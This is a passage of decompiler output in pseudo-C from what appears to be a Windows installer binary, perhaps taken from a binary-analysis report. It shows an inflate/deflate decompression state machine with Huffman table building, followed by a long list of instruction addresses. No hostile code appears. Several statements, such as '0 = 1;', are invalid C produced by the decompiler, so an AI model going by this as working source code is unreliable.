												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e388;
												if( *0x42e388 != 0) {
													L22:
													_t412 =  *0x40a40c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a410; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d204; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d200; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d208;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d688;
													if(_t416 < 0x42d688) {
														L15:
														__eflags = _t416 - 0x42d444;
														_t438 = 8;
														if(_t416 > 0x42d444) {
															__eflags = _t416 - 0x42d608;
															if(_t416 >= 0x42d608) {
																__eflags = _t416 - 0x42d668;
																if(_t416 < 0x42d668) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00406F19(0x42d208, 0x120, 0x101, 0x40840c, 0x40844c, 0x42d204, 0x40a40c, 0x42db08, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d208, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d208 + _t440;
														E00406F19(0x42d208, 0x1e, 0, 0x40848c, 0x4084c8, 0x42d200, 0x40a410, 0x42db08, _t448 - 8);
														 *0x42e388 =  *0x42e388 + 1;
														__eflags =  *0x42e388;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405AB9( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00406F19( &(__esi[3]), __edi, 0x101, 0x40840c, 0x40844c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00406F19(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40848c, 0x4084c8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                0x00406742
                0x00406742
                0x00406742
                0x00406742
                0x00406742
                0x00406746
                0x00000000
                0x00000000
                0x0040674c
                0x0040674c
                0x0040674f
                0x00406752
                0x00406757
                0x00406759
                0x0040675c
                0x0040675f
                0x00406762
                0x00406762
                0x00406765
                0x00000000
                0x00000000
                0x00406767
                0x00406767
                0x0040676a
                0x0040676f
                0x00406771
                0x00406774
                0x0040677a
                0x004064d9
                0x004064d9
                0x004064dc
                0x004064e2
                0x004064e8
                0x004064f1
                0x004064f7
                0x004064fa
                0x00406501
                0x00406506
                0x0040650c
                0x00406517
                0x00406517
                0x00406780
                0x00406780
                0x0040678a
                0x00000000
                0x00000000
                0x00406790
                0x00406790
                0x00406794
                0x00406797
                0x00406797
                0x0040679b
                0x004067a1
                0x004067a1
                0x004067a4
                0x004067a7
                0x004067ad
                0x00000000
                0x00000000
                0x004067af
                0x004067d1
                0x004067d1
                0x004067d4
                0x00000000
                0x00000000
                0x004067b1
                0x004067b5
                0x00000000
                0x00000000
                0x004067bb
                0x004067bb
                0x004067be
                0x004067c1
                0x004067c6
                0x004067c8
                0x004067cb
                0x004067ce
                0x004067ce
                0x004067d6
                0x004067d6
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e2
                0x004067e9
                0x004067ed
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fd
                0x00406802
                0x00000000
                0x00000000
                0x00406804
                0x00406818
                0x00406818
                0x0040681c
                0x00000000
                0x00000000
                0x00406806
                0x00406809
                0x00406809
                0x00406810
                0x00406815
                0x00406815
                0x00406815
                0x0040681e
                0x0040681e
                0x00406821
                0x0040682f
                0x00406835
                0x0040683a
                0x00406840
                0x00406846
                0x0040684c
                0x00406853
                0x00406867
                0x00406867
                0x00406e36
                0x00406e36
                0x00406e36
                0x00406e3b
                0x00000000
                0x00000000
                0x00406473
                0x00406473
                0x00000000
                0x00406a6e
                0x00406a6e
                0x00406a72
                0x00406a75
                0x00406a78
                0x00406a7b
                0x00000000
                0x00000000
                0x00406a81
                0x00406a81
                0x00406aa6
                0x00406aa6
                0x00406aa6
                0x00406aa8
                0x00000000
                0x00000000
                0x00406a86
                0x00406a86
                0x00406a8a
                0x00000000
                0x00000000
                0x00406a90
                0x00406a90
                0x00406a93
                0x00406a96
                0x00406a99
                0x00406a9b
                0x00406a9d
                0x00406aa0
                0x00406aa3
                0x00406aa3
                0x00406aa3
                0x00406aaa
                0x00406aaa
                0x00406ab2
                0x00406ab5
                0x00406ab8
                0x00406abb
                0x00406abf
                0x00406ac2
                0x00406ac4
                0x00406ac7
                0x00406ac9
                0x00406add
                0x00406add
                0x00406ae0
                0x00406afa
                0x00406afa
                0x00406afd
                0x00000000
                0x00000000
                0x00406b03
                0x00406b03
                0x00406b06
                0x00000000
                0x00000000
                0x00406b0c
                0x00406b0c
                0x00000000
                0x00406b0c
                0x00406ae2
                0x00406ae5
                0x00406aec
                0x00406aef
                0x00000000
                0x00406aef
                0x00406acb
                0x00406acf
                0x00406ad2
                0x00000000
                0x00000000
                0x00406b17
                0x00406b17
                0x00406b3c
                0x00406b3c
                0x00406b3c
                0x00406b3e
                0x00000000
                0x00000000
                0x00406b1c
                0x00406b1c
                0x00406b20
                0x00000000
                0x00000000
                0x00406b26
                0x00406b26
                0x00406b29
                0x00406b2c
                0x00406b2f
                0x00406b31
                0x00406b33
                0x00406b36
                0x00406b39
                0x00406b39
                0x00406b39
                0x00406b40
                0x00406b48
                0x00406b4b
                0x00406b4e
                0x00406b50
                0x00406b53
                0x00406b53
                0x00406b55
                0x00406b59
                0x00406b5c
                0x00406b5f
                0x00406b62
                0x00000000
                0x00000000
                0x00406b68
                0x00406b68
                0x00406b8d
                0x00406b8d
                0x00406b8d
                0x00406b8f
                0x00000000
                0x00000000
                0x00406b6d
                0x00406b6d
                0x00406b71
                0x00000000
                0x00000000
                0x00406b77
                0x00406b77
                0x00406b7a
                0x00406b7d
                0x00406b80
                0x00406b82
                0x00406b84
                0x00406b87
                0x00406b8a
                0x00406b8a
                0x00406b8a
                0x00406b91
                0x00406b91
                0x00406b99
                0x00406b9c
                0x00406b9f
                0x00406ba2
                0x00406ba6
                0x00406ba9
                0x00406bab
                0x00406bae
                0x00406bb1
                0x00406bcb
                0x00406bcb
                0x00406bce
                0x00000000
                0x00000000
                0x00406bd4
                0x00406bd4
                0x00406bd7
                0x00406bde
                0x00000000
                0x00406bde
                0x00406bb3
                0x00406bb6
                0x00406bbd
                0x00406bc0
                0x00000000
                0x00000000
                0x00406be6
                0x00406be6
                0x00406c0b
                0x00406c0b
                0x00406c0b
                0x00406c0d
                0x00000000
                0x00000000
                0x00406beb
                0x00406beb
                0x00406bef
                0x00000000
                0x00000000
                0x00406bf5
                0x00406bf5
                0x00406bf8
                0x00406bfb
                0x00406bfe
                0x00406c00
                0x00406c02
                0x00406c05
                0x00406c08
                0x00406c08
                0x00406c08
                0x00406c0f
                0x00406c17
                0x00406c1a
                0x00406c1d
                0x00406c1f
                0x00406c22
                0x00406c22
                0x00406c24
                0x00000000
                0x00000000
                0x00406c2a
                0x00406c2a
                0x00406c2d
                0x00406c32
                0x00406c34
                0x00406c3a
                0x00406c3c
                0x00406c51
                0x00406c53
                0x00406c53
                0x00406c3e
                0x00406c44
                0x00406c46
                0x00406c48
                0x00406c48
                0x00406c55
                0x00406c59
                0x00406c5c
                0x00406c62
                0x00406c62
                0x00406c65
                0x00406c65
                0x00406c65
                0x00406c67
                0x00000000
                0x00000000
                0x00406c6d
                0x00406c6d
                0x00406c73
                0x00406c75
                0x00406c9a
                0x00406c9d
                0x00406ca3
                0x00406ca8
                0x00406cae
                0x00406cb4
                0x00406cb6
                0x00406cb9
                0x00406cc2
                0x00406cc8
                0x00406cc8
                0x00406cbb
                0x00406cbd
                0x00406cbf
                0x00406cbf
                0x00406cca
                0x00406cd0
                0x00406cd2
                0x00406cd5
                0x00406cd7
                0x00406cdd
                0x00406cdf
                0x00406ce1
                0x00406ce3
                0x00406ce5
                0x00406ce8
                0x00406cf1
                0x00406cf4
                0x00406cf4
                0x00406cea
                0x00406cea
                0x00406ced
                0x00406ced
                0x00406ce8
                0x00406cdf
                0x00406cf6
                0x00406cf8
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406cf8
                0x00406c77
                0x00406c77
                0x00406c7d
                0x00406c83
                0x00406c85
                0x00000000
                0x00000000
                0x00406c87
                0x00406c87
                0x00406c89
                0x00406c8b
                0x00406c94
                0x00406c94
                0x00406c8d
                0x00406c8d
                0x00406c90
